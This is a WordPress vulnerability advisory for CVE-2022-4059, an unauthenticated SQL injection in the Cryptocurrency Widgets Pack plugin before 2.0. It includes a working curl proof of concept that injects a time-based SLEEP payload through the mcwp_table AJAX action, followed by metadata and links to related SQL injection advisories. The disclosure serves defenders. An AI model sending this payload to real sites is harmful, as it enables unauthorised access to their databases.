Cryptocurrency Widgets Pack < 2.0 – Unauthenticated SQLi | CVE 2022-4059 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

Invoke the following curl command to induce a 5 seconds sleep:

time curl 'https://exampe.com/wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order\[0\]\[column\]=0&columns\[0\]\[name\]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))aaaa)--+-'

Affects Plugins

cryptocurrency-widgets-pack

Fixed in 2.0

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com

Submitter twitter

Verified

Yes

WPVDB ID

d94bb664-261a-4f3f-8cc3-a2db8230895d

Timeline

Publicly Published

2022-12-09 (about 3 years ago)

Added

2022-12-09 (about 3 years ago)

Last Updated

2023-07-07 (about 2 years ago)

Other

Published

Title

Published

2025-07-24

Title

WooCommerce Point Of Sale (POS) <= 1.4 - Authenticated (Subscriber+) SQL Injection

Published

2025-11-18

Title

Community Events < 1.5.5 - Unauthenticated SQL Injection

Published

2015-04-28

Title

rtMedia for WordPress, BuddyPress & bbPress 3.7.39 - SQL Injection

Published

2025-01-25

Title

Quiz Maker Business, Developer, and Agency - Unauthenticated SQL Injection via id

Published

2016-06-06

Title

Double Opt-In for Download < 2.1.0 - Authenticated SQL Injection